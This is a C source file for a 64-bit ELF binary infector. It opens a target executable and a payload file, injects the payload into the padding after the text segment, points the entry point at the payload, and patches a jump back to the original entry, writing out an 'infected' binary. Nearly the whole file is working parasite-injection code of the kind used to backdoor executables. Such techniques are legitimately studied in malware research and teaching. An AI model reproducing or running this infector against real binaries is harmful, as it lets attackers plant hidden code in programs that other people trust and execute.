#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <elf.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>


void print_status(char* status_str);
void print_error(char* error_str);
void check_elf_criteria(char* filename);
uint8_t* text_segment_padding_64b(uint8_t* elf, int size_elf, uint8_t* payload, int size_payload);

int PAGE_SZ64;

uint8_t return_from_parasite[] =
"\xe9\x41\x41\x41\x41";
const int size_return_from_parasite = 5;

int main(int argc, char** argv)
{
	/* Check arguments */
	if (argc != 4)
	{
		printf("Usage: %s <target_elf> <payload> <file_injected_result>\n", argv[0]);
		printf("\ttarget_elf: the 64 bit elf binary to infect\n");
		printf("\tpayload: the payload that will be injected\n");
		printf("\tfile_injected_result: the output infected elf\n");
		exit(0);
	}
	
	PAGE_SZ64 = getpagesize();
	struct stat st;
	int size_elf;
	int size_payload;
	int size_infected;
	uint8_t* elf;
	uint8_t* payload;
	uint8_t* infected;

	/* Check for ELF file 64b ET_EXEC or ET_DYN */
	check_elf_criteria(argv[1]);

	print_status("Parsing the files...");
	/* Open the files */
	int fd_elf = open(argv[1], O_RDONLY);
	int fd_payload = open(argv[2], O_RDONLY);
	int fd_infected = open(argv[3], O_WRONLY | O_CREAT | O_TRUNC, S_IRUSR | S_IWUSR | S_IXUSR);
	/* Check for errors */
	if (fd_elf == -1)
		print_error("Error opening target binary file");
	if (fd_payload == -1)
		print_error("Error opening the payload file");
	if (fd_infected == -1)
		print_error("Error opening the infected elf result file");

	/* Get the size of the elf target and of the payload */
	if (fstat(fd_elf, &st) != 0)
		print_error("Error calling fstat");

	size_elf = st.st_size;

	if (fstat(fd_payload, &st) != 0)
		print_error("Error calling fstat");

	size_payload = st.st_size;

	/* Allocate the memory and copy the elf and the payload to it */
	elf = malloc(size_elf);
	payload = malloc(size_payload);
	if (elf == NULL || payload == NULL)
		print_error("Error allocating required memory");

	if ((read(fd_elf, elf, size_elf)) != size_elf)
		print_error("Error copying elf file to memory");
	if ((read(fd_payload, payload, size_payload)) != size_payload)
		print_error("Error copyint the payload to memory");


	/* Run the procedure to infect the elf binary */
	infected = text_segment_padding_64b(elf, size_elf, payload, size_payload);
	
	/* Write the result to the file injected result */
	if (write(fd_infected, infected, size_elf + PAGE_SZ64) != size_elf + PAGE_SZ64)
		print_error("Error writing the infected file");

	/* Free resources */
	free(elf);
	free(payload);
	free(infected);
	/* Close all the files descriptors */
	close(fd_elf);
	close(fd_payload);
	close(fd_infected);
	/* Exit */
	print_status("File injection complete. Exiting...");
	return 0;	
}

/* Print the current status */
void print_status(char* status_str)
{
	printf("[*] %s\n", status_str);
}

/* Print error and exit */
void print_error(char* error_str)
{
	printf("[!] %s\n", error_str);
	exit(-1);
}


/*
 * Check for the following criteria:
 * 1. Must be an ELF
 * 2. Must be either ET_EXEC or ET_DYN type
 * 3. Must be 64bit executable
 * */
void check_elf_criteria(char* filename)
{
	print_status("Checking elf criteria...");
	int fd;
	struct stat st;
	Elf64_Ehdr* elf_hdr;
	Elf64_Phdr* prog_hdr;
	uint8_t mem[PAGE_SZ64];

	/* Open the target file and copy the first part of the file to memory */
	fd = open(filename, O_RDONLY, 0);
	if (fd < 0)
		print_error("Error opening target file");
	if (read(fd, mem, PAGE_SZ64) < 0)
		print_error("Error copying target file to memory");
	close(fd);

	/* Read the elf header information and the program headers */
	elf_hdr = (Elf64_Ehdr*) mem;
	prog_hdr = (Elf64_Phdr*) &mem[elf_hdr->e_phoff];

	/* Check for filetype */
	if (memcmp("\x7f\x45\x4c\x46", mem, 4) != 0)
		print_error("The target file is not an ELF");

	/* Check for ET_EXEC or ET_DYN */
	if (elf_hdr->e_type != ET_EXEC && elf_hdr->e_type != ET_DYN)
		print_error("The target file is not an ELF executable");

	/* Check for arch */
	if (elf_hdr->e_machine != EM_X86_64)
		print_error("The target file is not a 64 bit executable");

	return;
}

/*
 * The procedure for text segment padding injection is the following:
 * 1. Increase the section header offset by PAGE_SIZE effectively moving all the section headers by that
 * 2. Find the .text segment looping through program headers 
 * 3. Set the entry point to the parasite location
 * 4. Increase the .text segment size by the size of the parasite payload
 * 5. For every program header whose segment is after the parasite increase the offset by PAGE_SIZE
 * 6. For every section header whose section is after the parasite increase the offset by PAGE_SIZE
 * 7. Increase the size of the section header containing the .text segment
 * 8. Write the result to the proper location in memory
 * */
uint8_t* text_segment_padding_64b(uint8_t* elf, int size_elf, uint8_t* payload, int size_payload)
{	
	print_status("Performing text segment padding injection...");
	Elf64_Ehdr* elf_hdr;
	Elf64_Phdr* prog_hdr;
	Elf64_Shdr* sect_hdr;
	Elf64_Addr entry_point, payload_vaddr, text_seg_end, text_seg_ext_end;

	int size_full_payload = size_payload + size_return_from_parasite;
	printf("[*] Payload size: 0x%x\n", size_full_payload);
	printf("[*] Page size 0x%x\n", getpagesize());

	if (size_full_payload > PAGE_SZ64)
		print_error("Payload file too long to fit in a single page");


	/* Allocate the memory for the output injected file */
	uint8_t* infected = malloc(size_elf + PAGE_SZ64);
	if (infected == NULL)
		print_error("Error allocating the result infected file buffer");

	/* Read the elf header and the first program and section header */
	elf_hdr = (Elf64_Ehdr*) elf;
	entry_point = elf_hdr->e_entry;
	prog_hdr = (Elf64_Phdr*) (elf + elf_hdr->e_phoff);
	sect_hdr = (Elf64_Shdr*) (elf + elf_hdr->e_shoff);

	/* Move all the section headers of one PAGE_SIZE */
	elf_hdr->e_shoff += PAGE_SZ64;

	/* Search for .text segment in the program headers */
	for (int i = 0; i < elf_hdr->e_phnum; i++)
	{
		if (prog_hdr[i].p_type == PT_LOAD && (prog_hdr[i].p_flags == (PF_X | PF_R)))
		{
			/* If the segment was found */
			printf("[*] Found .text segment at offset 0x%x\n", prog_hdr[i].p_offset);
		
			/* Save the old end of segment */
			text_seg_end = prog_hdr[i].p_offset + prog_hdr[i].p_filesz;
			
			int payload_space = 0;
			if (i + 1 < elf_hdr->e_phnum)
				payload_space = prog_hdr[i+1].p_offset - prog_hdr[i].p_offset
					- prog_hdr[i].p_memsz;

			printf("[*] Found 0x%x of payload space\n", payload_space);
			if (payload_space < size_full_payload)
				print_error("Payload cannot fit in the available space");
			
			/* Save the payload address and reset the entry point to it */
			payload_vaddr = prog_hdr[i].p_vaddr + prog_hdr[i].p_filesz;
			elf_hdr->e_entry = payload_vaddr;


			/* Increase the .text segment size, both on disk and in memory */
			prog_hdr[i].p_filesz += size_full_payload;
			text_seg_ext_end = prog_hdr[i].p_offset + prog_hdr[i].p_filesz;
			prog_hdr[i].p_memsz += size_full_payload;
			break;
		}
	}


	/* For each segment after the .text move it by PAGE_SIZE */
	for (int i = 0; i < elf_hdr->e_phnum; i++)
		if (prog_hdr[i].p_offset > text_seg_end)
			prog_hdr[i].p_offset += PAGE_SZ64;
	
	/*
	 * For each section after the .text segment's section move it by PAGE_SIZE
	 * If the section is the same as the .text segment increase its size by the parasite size
	 * */
	for (int i = 0; i < elf_hdr->e_shnum; i++)
	{
		if (sect_hdr[i].sh_offset > text_seg_end)
			sect_hdr[i].sh_offset += PAGE_SZ64;
		else if (sect_hdr[i].sh_addr + sect_hdr[i].sh_size == payload_vaddr)
			sect_hdr[i].sh_size += size_full_payload;
	}

	/* Calculate the jmp to the entry point */
	Elf64_Addr offset = entry_point - payload_vaddr - size_full_payload;
	/* Patch the parasite return address */
	memcpy(&return_from_parasite[1], &offset, 4);

	/* Copy the infected file to memory location */
	print_status("Copying injected elf file to disk");
	memcpy(infected, elf, (size_t) text_seg_end);
	memcpy(infected + text_seg_end, payload, size_payload);
	memcpy(infected + text_seg_end + size_payload, return_from_parasite, size_return_from_parasite);
	//memcpy(infected + text_seg_ext_end, elf + text_seg_ext_end, size_elf - text_seg_end);
	memcpy(infected + text_seg_end + PAGE_SZ64, elf + text_seg_end, size_elf - text_seg_end);
	return infected;
}


